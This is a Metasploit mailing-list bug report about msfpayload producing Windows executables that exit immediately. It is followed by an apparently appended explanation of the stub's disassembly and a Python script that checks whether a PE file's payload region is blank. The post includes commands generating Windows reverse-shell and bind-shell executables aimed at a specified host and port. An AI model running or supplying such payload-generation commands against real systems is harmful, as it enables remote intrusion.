Metasploit mailing list archives

possible bug in msfpayload create windows exe in current svn shot


From: security at vahle.de (Thomas Werth)
Date: Tue, 16 Dec 2008 10:05:44 +0100

Hi,

I'm using the current svn shot of metasploit. MSFPayload seems to fail in
creating standalone Windows executables.

Example:

bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.10.10.61 LPORT=4444 X > /root/work/msf_bind_full2_4444.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 287
Options: LHOST=10.10.10.61,LPORT=4444

bt framework3 # ./msfpayload windows/shell_bind_tcp LHOST=10.10.10.61 LPORT=4444 X > /root/work/msf_bind_full_4444.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LHOST=10.10.10.61,LPORT=4444


Both commands produce files with an identical file size of 9.728 bytes. The
files exit right after start without any attempt to make a network connection
(tested with Wireshark).

The disassembly of such a file contains this:

.text:00401000                 public start
.text:00401000 start           proc near
.text:00401000                 xor     eax, eax
.text:00401002                 mov     ecx, offset unk_402000
.text:00401007                 push    offset loc_401030
.text:0040100C                 push    dword ptr fs:[eax]
.text:0040100F                 mov     fs:[eax], esp
.text:00401012                 push    eax
.text:00401013                 push    40h
.text:00401015                 push    2000h
.text:0040101A                 push    ecx
.text:0040101B                 push    ecx
.text:0040101C                 jmp     loc_401040
.text:0040101C ; ---------------------------------------------------------------------------
.text:00401021                 align 10h
.text:00401030
.text:00401030 loc_401030:                             ; DATA XREF: start+7o
.text:00401030                 jmp     ds:ExitProcess
.text:00401030 ; ---------------------------------------------------------------------------
.text:00401036                 align 10h
.text:00401040
.text:00401040 loc_401040:                             ; CODE XREF: start+1Cj
.text:00401040                 jmp     ds:VirtualProtect

greets
tom
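The disassembly above shows what the template stub does before any payload runs: it installs an SEH frame whose handler is a jump to ExitProcess, then calls VirtualProtect on address 0x402000 (image base 0x400000 plus RVA 0x2000) with size 0x2000 and protection 0x40, which is PAGE_EXECUTE_READWRITE, and continues into that region. If the bytes at RVA 0x2000 are all zero on disk, the first instruction executed there faults and the SEH handler exits the process quietly, which matches "exits right after start" and would also explain two outputs of identical size. The following script is an added triage check, not code from the post or from Metasploit: it parses the PE section table, locates the file bytes backing the region the stub unprotects, and reports whether anything was written there. The RVA, size and protection constant are taken from the disassembly; the minimal PE image it builds for demonstration is constructed here and is not a real msfpayload template.

```python
import struct

# Parameters taken from the stub in the post's disassembly: VirtualProtect is
# called on 0x402000 (IMAGE_BASE + PAYLOAD_RVA) with size 0x2000 and
# protection 0x40 (PAGE_EXECUTE_READWRITE) before control goes there.
IMAGE_BASE = 0x400000
PAYLOAD_RVA = 0x2000
PAYLOAD_SIZE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40


def parse_sections(pe: bytes) -> list:
    """Read the section table of a PE32/PE32+ image into a list of dicts."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name, vsize, rva, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "rva": rva,
                         "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "characteristics": chars})
    return sections


def section_for_rva(sections: list, rva: int):
    """Return the section whose virtual range covers rva, or None."""
    for s in sections:
        span = max(s["virtual_size"], s["raw_size"])
        if s["rva"] <= rva < s["rva"] + span:
            return s
    return None


def payload_region(pe: bytes, rva: int = PAYLOAD_RVA, size: int = PAYLOAD_SIZE) -> bytes:
    """File bytes backing the region the stub unprotects, clipped to what is on disk."""
    s = section_for_rva(parse_sections(pe), rva)
    if s is None:
        return b""
    start = s["raw_ptr"] + (rva - s["rva"])
    end = min(start + size, s["raw_ptr"] + s["raw_size"])
    return pe[start:end]


def payload_is_blank(pe: bytes) -> bool:
    """True when nothing non-zero was written where the stub transfers control."""
    region = payload_region(pe)
    return len(region) == 0 or not any(region)


def describe(pe: bytes) -> dict:
    """Summary a reviewer would want: which section, file offset, size, blank or not."""
    s = section_for_rva(parse_sections(pe), PAYLOAD_RVA)
    return {
        "section": s["name"] if s else None,
        "file_offset": (s["raw_ptr"] + PAYLOAD_RVA - s["rva"]) if s else None,
        "bytes_on_disk": len(payload_region(pe)),
        "blank": payload_is_blank(pe),
    }


def build_test_image(payload: bytes) -> bytes:
    """Constructed minimal PE32 for demonstration (not a real msfpayload template):
    .text at RVA 0x1000 holds dummy bytes, .data at RVA 0x2000 holds `payload`."""
    file_align = 0x200
    data_size = max(file_align, -(-len(payload) // file_align) * file_align)
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, IMAGE_BASE)            # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)   # Section/FileAlignment

    def sect(name, va, raw, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, raw, va, raw, raw_ptr, 0, 0, 0, 0, chars)

    headers = (dos + coff + bytes(opt)
               + sect(b".text", 0x1000, 0x200, 0x200, 0x60000020)
               + sect(b".data", 0x2000, data_size, 0x400, 0xC0000040)).ljust(0x200, b"\0")
    text = (b"\xcc" * 0x20).ljust(0x200, b"\0")   # stand-in for the stub, constructed
    return headers + text + payload.ljust(data_size, b"\0")


if __name__ == "__main__":
    # Constructed inputs: one image with an all-zero region, one with marker bytes.
    for label, blob in (("blank", b"\0" * 0x100), ("filled", b"\x01\x02\x03" * 8)):
        print(label, describe(build_test_image(blob)))
```

Run it against a real generated file by replacing the constructed images with `open(path, "rb").read()`; a `blank: True` result means the generator never wrote the payload into the template, while `blank: False` points at the payload or the stub itself rather than at the embedding step.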


